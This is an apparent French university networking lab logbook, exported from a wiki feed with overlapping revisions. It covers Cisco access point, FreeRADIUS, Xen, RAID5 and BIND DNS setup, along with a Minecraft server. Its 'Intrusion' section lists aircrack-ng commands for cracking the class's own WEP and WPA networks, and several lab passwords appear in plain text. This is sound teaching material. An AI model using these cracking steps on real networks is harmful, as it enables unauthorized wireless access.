 &amp;lt;pre&amp;gt;ap(config)#hostname SE2A5-AP1&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Accès SSH :&lt;br /&gt;
 SE2A5-AP1(config)#aaa new-model&lt;br /&gt;
 SE2A5-AP1(config)#username admin privilege 15 secret glopglop&lt;br /&gt;
 SE2A5-AP1(config)#ip domain-name plil.info&lt;br /&gt;
 SE2A5-AP1(config)#crypto key generate rsa general-keys modulus 2048&lt;br /&gt;
 SE2A5-AP1(config)#ip ssh version 2&lt;br /&gt;
 SE2A5-AP1(config)#line vty 0 15&lt;br /&gt;
 SE2A5-AP1(config-line)#transport input ssh&lt;br /&gt;
 SE2A5-AP1(config-line)#exit&lt;br /&gt;
&lt;br /&gt;
Accès console :&lt;br /&gt;
 SE2A5-AP1(config)#line console 0&lt;br /&gt;
 SE2A5-AP1(config-line)#password glopglop&lt;br /&gt;
 SE2A5-AP1(config-line)#login authentification default&lt;br /&gt;
 SE2A5-AP1(config-line)#exit&lt;br /&gt;
&lt;br /&gt;
Sécurisation des accès :&lt;br /&gt;
 SE2A5-AP1(config)#service password-encryption&lt;br /&gt;
 SE2A5-AP1(config)#enable secret glopglop&lt;br /&gt;
 SE2A5-AP1(config)#banner motd #Restricted Access#&lt;br /&gt;
&lt;br /&gt;
VLAN n°20&lt;br /&gt;
 &amp;lt;SE2A5-AP1(config)#aaa authentication login EAP_toto group RADIUS_toto&lt;br /&gt;
 SE2A5-AP1(config)#radius-server host 193.48.57.163 auth-port 1812 acct-port 1813 key glopglop&lt;br /&gt;
 SE2A5-AP1(config)#aaa group server radius RADIUS_toto&lt;br /&gt;
 SE2A5-AP1(config-server)#server 193.48.57.163 auth-port 1812 acct-port 1813&lt;br /&gt;
 SE2A5-AP1(config-server)#exit&lt;br /&gt;
 SE2A5-AP1(config)#dot11 ssid SE2A5_1&lt;br /&gt;
 SE2A5-AP1(config-ssid)#vlan 20&lt;br /&gt;
 SE2A5-AP1(config-ssid)#authentication open eap EAP_toto&lt;br /&gt;
 SE2A5-AP1(config-ssid)#authentication network-eap EAP_toto&lt;br /&gt;
 SE2A5-AP1(config-ssid)#authentication key-management wpa&lt;br /&gt;
 SE2A5-AP1(config-ssid)#exit&lt;br /&gt;
 SE2A5-AP1(config)#interface dot11radio0.20&lt;br /&gt;
 SE2A5-AP1(config-subif)#encapsulation dot1q 20&lt;br /&gt;
 SE2A5-AP1(config-subif)#bridge-group 20&lt;br /&gt;
 SE2A5-AP1(config-subif)#exit&lt;br /&gt;
 SE2A5-AP1(config)#interface g0.20&lt;br /&gt;
 SE2A5-AP1(config-subif)#encapsulation dot1q 20&lt;br /&gt;
 SE2A5-AP1(config-subif)#bridge-group 20&lt;br /&gt;
 SE2A5-AP1(config-subif)#exit&lt;br /&gt;
 SE2A5-AP1(config)#interface dot11radio 0&lt;br /&gt;
 SE2A5-AP2(config-if)#no shutdown&lt;br /&gt;
 SE2A5-AP1(config-if)#encryption vlan 20 mode ciphers aes-ccm tkip&lt;br /&gt;
 SE2A5-AP1(config-if)#mbssid&lt;br /&gt;
 SE2A5-AP1(config-if)#ssid SE2A5_1&lt;br /&gt;
 SE2A5-AP1(config-if)#exit&lt;br /&gt;
&lt;br /&gt;
Paramètres de minicom&lt;br /&gt;
 Serial Device : /dev/ttyACM0&lt;br /&gt;
VLAN n°1 :&lt;br /&gt;
 SE2A5-AP1(config)#interface BVI 1&lt;br /&gt;
 SE2A5-AP1(config-if)#ip address 10.0.0.10 255.255.255.0&lt;br /&gt;
 SE2A5-AP1(config-if)#no shutdown&lt;br /&gt;
 SE2A5-AP1(config-if)#exit&lt;br /&gt;
 SE2A5-AP1(config)#ip default-gateway 10.0.0.1&lt;br /&gt;
&lt;br /&gt;
== Configuration du serveur RADIUS ==&lt;br /&gt;
&lt;br /&gt;
Le serveur RADIUS permet l’authentification des utilisateurs qui se connectent aux points d’accès Wifi (WPA-EAP).&lt;br /&gt;
&lt;br /&gt;
* Installer le paquet &amp;lt;code&amp;gt;freeradius&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;apt install freeradius&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modifier le fichier &amp;lt;code&amp;gt;/etc/freeradius/clients.conf&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;client SE2A51 {&lt;br /&gt;
        ipaddr  = 10.0.0.10&lt;br /&gt;
        secret  = glopglop&lt;br /&gt;
}&lt;br /&gt;
}&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Ajouter un utilisateur en modifiant le fichier &amp;lt;code&amp;gt;/etc/freeradius/3.0/users&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;pifou Cleartext-Password := &amp;amp;quot;pasglop&amp;amp;quot;&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modifier le fichier &amp;lt;code&amp;gt;/etc/freeradius/3.0/mods-enables/eap&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;eap {&lt;br /&gt;
  default_eap_type = peap&lt;br /&gt;
  ...&lt;br /&gt;
}&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Arrêter le service &amp;lt;code&amp;gt;freeradius&amp;lt;/code&amp;gt; durant la phase de tests :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;service freeradius stop&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Démarrer &amp;lt;code&amp;gt;freeradius&amp;lt;/code&amp;gt; en mode debug :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;freeradius -X&amp;lt;/pre&amp;gt;&lt;br /&gt;
Pendant que &amp;lt;code&amp;gt;freeradius&amp;lt;/code&amp;gt; est en mode debug, tenter de se connecter au réseau Wifi qui a été créé et vérifier que celle-ci est prise en compte.&amp;lt;br /&amp;gt;&lt;br /&gt;
[[Fichier:freeradius_X.png]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On peut également voir la connexion de l'appareil sur minicom&lt;br /&gt;
&lt;br /&gt;
[[Fichier:connexion_minicom.png]]&lt;br /&gt;
&lt;br /&gt;
Si la connexion est validée alors la configuration est correcte. Dans ce cas, arrêter le programme de debug et réactiver le service.&lt;br /&gt;
&lt;br /&gt;
* Redémarrer le service &amp;lt;code&amp;gt;freeradius&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;service freeradius start&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Intrusion =&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== WEP ==&lt;br /&gt;
&lt;br /&gt;
Pour casser une clé WEP il nous faut le logiciel Aircrack:&lt;br /&gt;
 apt-get install aircrack-ng&lt;br /&gt;
&lt;br /&gt;
Il faut tout d'abord se mettre sur la bonne interface ethernet:&lt;br /&gt;
 airmon-ng start wlan0mon&lt;br /&gt;
&lt;br /&gt;
On se met ensuite en écoute sur ce réseau en indiquant le cryptage (WEP)&lt;br /&gt;
 airodump-ng --encrypt wep wlan0mon&lt;br /&gt;
&lt;br /&gt;
On recupere ensuite l'ESSID et le BSSID correspondant a notre groupe (Groupe 1)&lt;br /&gt;
&lt;br /&gt;
(Ne pas juger la qualité du photographe)&lt;br /&gt;
[[Fichier:WEP_Liste.jpg]]&lt;br /&gt;
&lt;br /&gt;
On s'identifie&lt;br /&gt;
 aireplay-ng -9 -e cracotte01 -a 04:DA:D2:9C:50:50 wlan0mon&lt;br /&gt;
&lt;br /&gt;
Nous recuperons ensuite les VI que l'on stock dans un fichier qui nous permettera de casser la clé :&lt;br /&gt;
 airodump-ng -c 4 --bssid 04:DA:D2:9C:50:50 -w output wlan0mon&lt;br /&gt;
&lt;br /&gt;
Nous procédons maintenant a la fausse identification: &lt;br /&gt;
 aireplay-ng -1 0 -e cracotte01 -a 04:DA:D2:9C:50:50 -h 40:A5:EF:01:21:80 wlan0mon&lt;br /&gt;
&lt;br /&gt;
Il ne reste plus qu'a lancer le crack de la clé &lt;br /&gt;
 aircrack-ng -b 04:DA:D2:9C:50:50 output*.cap&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Resultat: &lt;br /&gt;
&lt;br /&gt;
[[Fichier:cléWEP.jpeg]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== WPA ==&lt;br /&gt;
&lt;br /&gt;
Nous allons utiliser le même logiciel que pour WEP (aircrack)&lt;br /&gt;
&lt;br /&gt;
Pour recuperer la clé WPA, il faut attendre un handshake de krakote01&lt;br /&gt;
 airodump-ng wlx40a5efd2140c --essid kracotte01 -c 4 -w /tmp/wpa&lt;br /&gt;
&lt;br /&gt;
Une fois le handshake recuperer nous allons generer un dictionvaire de mot de passe (ici une combinaison de 8 chiffres)&lt;br /&gt;
 crunch 8 8 0123456789 -o password.lst&lt;br /&gt;
&lt;br /&gt;
Il nous reste plus qu'a utiliser aircrack comme ceci&lt;br /&gt;
 aircrack-ng -w password.lst wpa02.cap&lt;br /&gt;
&lt;br /&gt;
Il faut desormais être patient et attendre 5h40 pour essayer tout le dictionnaire.&lt;br /&gt;
&lt;br /&gt;
Un essaie en subdivisant a été fait mais sans resultat dans le temp imparti&lt;br /&gt;
&lt;br /&gt;
Après 4 heures 1 minutes et 29 seconde nous avons la clé: &lt;br /&gt;
 66699666&lt;br /&gt;
&lt;br /&gt;
[[Fichier:WPA_crack.png]]&lt;br /&gt;
&lt;br /&gt;
=MINECRAFT=&lt;br /&gt;
&lt;br /&gt;
Nous allons installer un serveur minecraft sur notre VM&lt;br /&gt;
&lt;br /&gt;
Pour cela nous allons avoir besoin de DOCKER&lt;br /&gt;
 apt-get install docker&lt;br /&gt;
&lt;br /&gt;
Une fois l'installation faite nous devons prendre une image de serveur minecraft:&lt;br /&gt;
 docker run -d -it -p 25565:25565 -e EULA=TRUE itzg/minecraft-server&lt;br /&gt;
&lt;br /&gt;
Cette image vient du github: https://github.com/itzg/docker-minecraft-server&lt;br /&gt;
&lt;br /&gt;
Nous mettons le port 25565 car c'est le port utilisé par minecraft&lt;br /&gt;
&lt;br /&gt;
Une fois cela fait nous pouvons visualiser les docker activité&lt;br /&gt;
 docker ps &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Fichier:docker_minecraft.png]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Connexion==&lt;br /&gt;
&lt;br /&gt;
Pour se connecter il suffit d'avoir un minecraft et de renseigner l'IP du serveur&lt;br /&gt;
&lt;br /&gt;
[[Fichier:minecraft_pc.png]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Le problème avec ce serveur minecraft est sa gourmandise en memoire. En effet, celui-ci plante lorsqu'il y a trop de redstone sur le serveur ou qu'il y a une trop grosse explosion de TNT.&lt;br /&gt;
&lt;br /&gt;
Cela doit être dû (pour la TNT) a un trop gros changement de map et besoin d'affichage qui nécessite trop de mémoire vive.&lt;br /&gt;
&lt;br /&gt;
Pour la redstone, étant donné que nous avons essayé de recréer des portes logique, cela devait trop &amp;quot;consommer&amp;quot;&lt;/div&gt;</summary>
		<author><name>Amace</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_SE2a5_2022/2023_G1&amp;diff=60271</id>
		<title>TP sysres SE2a5 2022/2023 G1</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_SE2a5_2022/2023_G1&amp;diff=60271"/>
				<updated>2022-11-28T23:42:41Z</updated>
		
		<summary type="html">&lt;p&gt;Amace : /* Configuration du serveur RADIUS */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
&lt;br /&gt;
== Cahier de suivi - Groupe 1 ==&lt;br /&gt;
= Sommaire =&lt;br /&gt;
&lt;br /&gt;
* [[#plan-dadressage|Plan d’adressage]]&lt;br /&gt;
* [[#machine-virtuelle|Machine Virtuelle]]&lt;br /&gt;
* [[#Intrusion|Intrusion]]&lt;br /&gt;
&lt;br /&gt;
= Plan d’adressage =&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! VLAN !!  Réseau IPv4 !! Réseau IPv6 !! @IPv4 virtuelle !! IPv4/IPv6 6509E (E304) !! IPv4/IPv6 C9200 (E306) !! IPv4/IPv6 ISR4331 !!SSID !! VM !! @IPv4 MV non routée !! @IPv4 MV  routée !! Nom de domaine !&lt;br /&gt;
|-&lt;br /&gt;
| Antonin / Hugo || 20 || 10.20.0.0/16 || - || 10.20.0.250 || 10.20.0.251 || 10.20.0.252 || 10.20.0.253 || - || HG || 172.26.145.76/24 || 193.48.57.163/28 || detestable.site&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
= Machine Virtuelle =&lt;br /&gt;
&lt;br /&gt;
== Création de la VM ==&lt;br /&gt;
&lt;br /&gt;
Pour créer la VM nous avons besoin de nous connecter sur Capbreton qui est le serveur qui va &amp;quot;heberger&amp;quot; notre VM xen&lt;br /&gt;
 ssh root@capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
On crée ensuite notre vm avec :&lt;br /&gt;
 xen-create-image --hostname=HG --gateway=193.48.57.175 --ip=193.48.57.163 --netmask=255.255.255.240 --dir=/usr/local/xen --password=glopglopglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
Pour acceder à la console de notre vm il faut modifier le fichier de configuration de notre VM (/etc/xen/HG.cfg) en y rajoutant :&lt;br /&gt;
 vif=['mac=00:16:3E:82:3E:78,bridge=IMA2a5' ]&lt;br /&gt;
&lt;br /&gt;
On crée 2 LVM permettant par la suite d'y rattacher notre /home et notre /var :&lt;br /&gt;
 lvcreate -L10G -n HG-home storage&lt;br /&gt;
 lvcreate -L10G -n HG-var storage&lt;br /&gt;
&lt;br /&gt;
Dans /etc/xen/HG.cfg :&lt;br /&gt;
 #  Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/HG/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/HG/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/storage/HG-home,xvdb1,w',&lt;br /&gt;
                  'phy:/dev/storage/HG-var,xvdc1,w',&lt;br /&gt;
              ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour demarrer notre VM nous utilisons :&lt;br /&gt;
 xen create /etc/xen/HG.cfg -c&lt;br /&gt;
&lt;br /&gt;
Le -c sert a se connecter directement &lt;br /&gt;
&lt;br /&gt;
Une fois sur la console de la machine, on modifie /etc/fstab, qui gère le mount des partitions au démarrage. On y rajoute les deux entrées suivantes:&lt;br /&gt;
 /dev/xvda3 /home ext4 defaults	0 2&lt;br /&gt;
 /dev/xvda4 /var  ext4 defaults	0 2&lt;br /&gt;
&lt;br /&gt;
On modifie également les partitions /dev/xvda3 et /dev/xvda4 en y ajoutant des filesystems de type ext4:&lt;br /&gt;
 mkfs.ext4 /dev/xdva3&lt;br /&gt;
&lt;br /&gt;
==Sécurisation des données - RAID5==&lt;br /&gt;
&lt;br /&gt;
On sécurise nos données à l'aide de RAID5&lt;br /&gt;
&lt;br /&gt;
Installer les paquets nécessaires sur la VM et capbreton :&lt;br /&gt;
 apt install mdadm&lt;br /&gt;
&lt;br /&gt;
Créer les partitions virtuelles pour le RAID :&lt;br /&gt;
 lvcreate -L1G -n detestable-raid-1 virtual&lt;br /&gt;
 lvcreate -L1G -n detestable-raid-2 virtual&lt;br /&gt;
 lvcreate -L1G -n detestable-raid-3 virtual&lt;br /&gt;
&lt;br /&gt;
Dans /etc/xen/HG.cfg :&lt;br /&gt;
 #  Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/HG/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/HG/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/storage/HG-home,xvdb1,w',&lt;br /&gt;
                  'phy:/dev/storage/HG-var,xvdc1,w',&lt;br /&gt;
                  'phy:/dev/virtual/detestable-raid-1,xvdd1,w',&lt;br /&gt;
                  'phy:/dev/virtual/detestable-raid-2,xvdd2,w',&lt;br /&gt;
                  'phy:/dev/virtual/detestable-raid-3,xvdd3,w'&lt;br /&gt;
                ]&lt;br /&gt;
On redémarre la VM :&lt;br /&gt;
 xen create /etc/xen/HG.cfg -c&lt;br /&gt;
Créer le RAID5 à l’aide de la commande mdadm :&lt;br /&gt;
 mdadm --create /dev/md0 --level=5 --raid-devices=3 /dev/xvdd1 /dev/xvdd2 /dev/xvdd3&lt;br /&gt;
Formater la partition RAID5 :&lt;br /&gt;
 mkfs.ext4 /dev/md0&lt;br /&gt;
Ajout de la partition au fichier /etc/fstab :&lt;br /&gt;
 /dev/md0 /media/raid ext4 defaults 0 1&lt;br /&gt;
On recharge les partitions afin de prendre en compte le RAID :&lt;br /&gt;
 mount -a&lt;br /&gt;
&lt;br /&gt;
[[Fichier:RAID5.png]]&lt;br /&gt;
== Serveur DNS ==&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, on utilise le registrar [[gandi.net|Gandi]] afin de réserver le nom de domaine &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt;.&amp;lt;br /&amp;gt;&lt;br /&gt;
Une fois le nom de domaine réservé, il est alors possible de configurer les serveurs de noms et les Glue Records :&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Ajouter le Glue Record vers &amp;lt;code&amp;gt;193.48.57.163&amp;lt;/code&amp;gt; afin d’associer le nom de domaine &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt; à l’adresse IP &amp;lt;code&amp;gt;193.48.57.163&amp;lt;/code&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Modifier les serveurs de noms pour utiliser &amp;lt;code&amp;gt;ns.detestable.site&amp;lt;/code&amp;gt; et &amp;lt;code&amp;gt;ns6.gandi.net&amp;lt;/code&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
En attendant que les serveurs de noms soient correctement modifiés, il est possible de changer les enregistrements DNS :&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Modifier l’enrgistrement DNS &amp;lt;code&amp;gt;@&amp;lt;/code&amp;gt;-&amp;lt;code&amp;gt;A&amp;lt;/code&amp;gt; avec la valeur &amp;lt;code&amp;gt;193.48.57.193&amp;lt;/code&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Ajouter l’enrgistrement DNS &amp;lt;code&amp;gt;ns&amp;lt;/code&amp;gt;-&amp;lt;code&amp;gt;A&amp;lt;/code&amp;gt; avec la valeur &amp;lt;code&amp;gt;193.48.57.193&amp;lt;/code&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
  → Modifier l’enrgistrement DNS &amp;lt;code&amp;gt;www&amp;lt;/code&amp;gt;-&amp;lt;code&amp;gt;CNAME&amp;lt;/code&amp;gt; avec la valeur &amp;lt;code&amp;gt;ns.detestable.site.&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Installation du paquet &amp;lt;code&amp;gt;bind9&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;apt install bind9&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/resolv.conf&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;nameserver 127.0.0.1&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.local&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;zone &amp;amp;quot;detestable.site&amp;amp;quot; {&lt;br /&gt;
    type master;&lt;br /&gt;
    file &amp;amp;quot;/etc/bind/db.detestable.site&amp;amp;quot;;&lt;br /&gt;
    allow-transfer { 217.70.177.40; }; // ns6.gandi.net&lt;br /&gt;
};&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.options&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;options{&lt;br /&gt;
  directory &amp;amp;quot;/var/cache/bind&amp;amp;quot;;&lt;br /&gt;
  forwarders {&lt;br /&gt;
    8.8.8.8;&lt;br /&gt;
    4.4.2.2;&lt;br /&gt;
  };&lt;br /&gt;
  dnssec-validation auto;&lt;br /&gt;
  listen-on-v6 { any; };&lt;br /&gt;
  allow-transfer { &amp;amp;quot;allowed_to_transfer&amp;amp;quot;; };&lt;br /&gt;
};&lt;br /&gt;
acl &amp;amp;quot;allowed_to_transfer&amp;amp;quot; {&lt;br /&gt;
  217.70.177.40/32;&lt;br /&gt;
};&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Créer le fichier BIND pour &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;cp /etc/bind/db.local /etc/bind/db.detestable.site&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/bind/db.detestable.site&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;;&lt;br /&gt;
; BIND data file for detestable.site&lt;br /&gt;
;&lt;br /&gt;
$TTL    604800&lt;br /&gt;
@       IN      SOA     ns.detestable.site. root.detestable.site. (&lt;br /&gt;
                              3         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
;&lt;br /&gt;
@   IN  NS  ns.detestable.site.&lt;br /&gt;
@   IN  NS  ns6.gandi.net.&lt;br /&gt;
@   IN  A   193.48.57.163&lt;br /&gt;
NS  IN  A   193.48.57.163&lt;br /&gt;
NS  IN  AAAA    2001:660:4401:60a0:216:3eff:fe82:3e78&lt;br /&gt;
WWW IN  CNAME   NS&lt;br /&gt;
SSH IN  CNAME   NS&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Redémarrage du service &amp;lt;code&amp;gt;bind9&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;service bind9 restart&amp;lt;/pre&amp;gt;&lt;br /&gt;
=== Tester DNS : ===&lt;br /&gt;
&lt;br /&gt;
* Modification du fichier &amp;lt;code&amp;gt;/etc/resolv.conf&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;nameserver 193.48.57.163&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Vérification de la traduction du nom de domaine &amp;lt;code&amp;gt;detestable.site&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;nslookup detestable.site&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Connexion wifi=&lt;br /&gt;
==Point d'accès wifi==&lt;br /&gt;
Paramètres de minicom&lt;br /&gt;
 Serial Device : /dev/ttyUSB0&lt;br /&gt;
&lt;br /&gt;
Mode terminal&lt;br /&gt;
 ap&amp;amp;gt;enable&lt;br /&gt;
 ap#configure terminal&lt;br /&gt;
&lt;br /&gt;
Configuration du nom d’hôte :&lt;br /&gt;
 &amp;lt;pre&amp;gt;ap(config)#hostname SE2A5-AP1&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Accès SSH :&lt;br /&gt;
 SE2A5-AP1(config)#aaa new-model&lt;br /&gt;
 SE2A5-AP1(config)#username admin privilege 15 secret glopglop&lt;br /&gt;
 SE2A5-AP1(config)#ip domain-name plil.info&lt;br /&gt;
 SE2A5-AP1(config)#crypto key generate rsa general-keys modulus 2048&lt;br /&gt;
 SE2A5-AP1(config)#ip ssh version 2&lt;br /&gt;
 SE2A5-AP1(config)#line vty 0 15&lt;br /&gt;
 SE2A5-AP1(config-line)#transport input ssh&lt;br /&gt;
 SE2A5-AP1(config-line)#exit&lt;br /&gt;
&lt;br /&gt;
Accès console :&lt;br /&gt;
 SE2A5-AP1(config)#line console 0&lt;br /&gt;
 SE2A5-AP1(config-line)#password glopglop&lt;br /&gt;
 SE2A5-AP1(config-line)#login authentification default&lt;br /&gt;
 SE2A5-AP1(config-line)#exit&lt;br /&gt;
&lt;br /&gt;
Sécurisation des accès :&lt;br /&gt;
 SE2A5-AP1(config)#service password-encryption&lt;br /&gt;
 SE2A5-AP1(config)#enable secret glopglop&lt;br /&gt;
 SE2A5-AP1(config)#banner motd #Restricted Access#&lt;br /&gt;
&lt;br /&gt;
VLAN n°20&lt;br /&gt;
 &amp;lt;SE2A5-AP1(config)#aaa authentication login EAP_toto group RADIUS_toto&lt;br /&gt;
 SE2A5-AP1(config)#radius-server host 193.48.57.163 auth-port 1812 acct-port 1813 key glopglop&lt;br /&gt;
 SE2A5-AP1(config)#aaa group server radius RADIUS_toto&lt;br /&gt;
 SE2A5-AP1(config-server)#server 193.48.57.163 auth-port 1812 acct-port 1813&lt;br /&gt;
 SE2A5-AP1(config-server)#exit&lt;br /&gt;
 SE2A5-AP1(config)#dot11 ssid SE2A5_1&lt;br /&gt;
 SE2A5-AP1(config-ssid)#vlan 20&lt;br /&gt;
 SE2A5-AP1(config-ssid)#authentication open eap EAP_toto&lt;br /&gt;
 SE2A5-AP1(config-ssid)#authentication network-eap EAP_toto&lt;br /&gt;
 SE2A5-AP1(config-ssid)#authentication key-management wpa&lt;br /&gt;
 SE2A5-AP1(config-ssid)#exit&lt;br /&gt;
 SE2A5-AP1(config)#interface dot11radio0.20&lt;br /&gt;
 SE2A5-AP1(config-subif)#encapsulation dot1q 20&lt;br /&gt;
 SE2A5-AP1(config-subif)#bridge-group 20&lt;br /&gt;
 SE2A5-AP1(config-subif)#exit&lt;br /&gt;
 SE2A5-AP1(config)#interface g0.20&lt;br /&gt;
 SE2A5-AP1(config-subif)#encapsulation dot1q 20&lt;br /&gt;
 SE2A5-AP1(config-subif)#bridge-group 20&lt;br /&gt;
 SE2A5-AP1(config-subif)#exit&lt;br /&gt;
 SE2A5-AP1(config)#interface dot11radio 0&lt;br /&gt;
 SE2A5-AP2(config-if)#no shutdown&lt;br /&gt;
 SE2A5-AP1(config-if)#encryption vlan 20 mode ciphers aes-ccm tkip&lt;br /&gt;
 SE2A5-AP1(config-if)#mbssid&lt;br /&gt;
 SE2A5-AP1(config-if)#ssid SE2A5_1&lt;br /&gt;
 SE2A5-AP1(config-if)#exit&lt;br /&gt;
&lt;br /&gt;
Paramètres de minicom&lt;br /&gt;
 Serial Device : /dev/ttyACM0&lt;br /&gt;
VLAN n°1 :&lt;br /&gt;
 SE2A5-AP1(config)#interface BVI 1&lt;br /&gt;
 SE2A5-AP1(config-if)#ip address 10.0.0.10 255.255.255.0&lt;br /&gt;
 SE2A5-AP1(config-if)#no shutdown&lt;br /&gt;
 SE2A5-AP1(config-if)#exit&lt;br /&gt;
 SE2A5-AP1(config)#ip default-gateway 10.0.0.1&lt;br /&gt;
&lt;br /&gt;
== Configuration du serveur RADIUS ==&lt;br /&gt;
&lt;br /&gt;
Le serveur RADIUS permet l’authentification des utilisateurs qui se connectent aux points d’accès Wifi (WPA-EAP).&lt;br /&gt;
&lt;br /&gt;
* Installer le paquet &amp;lt;code&amp;gt;freeradius&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;apt install freeradius&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modifier le fichier &amp;lt;code&amp;gt;/etc/freeradius/clients.conf&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;client SE2A51 {&lt;br /&gt;
        ipaddr  = 10.0.0.10&lt;br /&gt;
        secret  = glopglop&lt;br /&gt;
}&lt;br /&gt;
}&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Ajouter un utilisateur en modifiant le fichier &amp;lt;code&amp;gt;/etc/freeradius/3.0/users&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;pifou Cleartext-Password := &amp;amp;quot;pasglop&amp;amp;quot;&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Modifier le fichier &amp;lt;code&amp;gt;/etc/freeradius/3.0/mods-enables/eap&amp;lt;/code&amp;gt; :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;eap {&lt;br /&gt;
  default_eap_type = peap&lt;br /&gt;
  ...&lt;br /&gt;
}&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Arrêter le service &amp;lt;code&amp;gt;freeradius&amp;lt;/code&amp;gt; durant la phase de tests :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;service freeradius stop&amp;lt;/pre&amp;gt;&lt;br /&gt;
* Démarrer &amp;lt;code&amp;gt;freeradius&amp;lt;/code&amp;gt; en mode debug :&lt;br /&gt;
&lt;br /&gt;
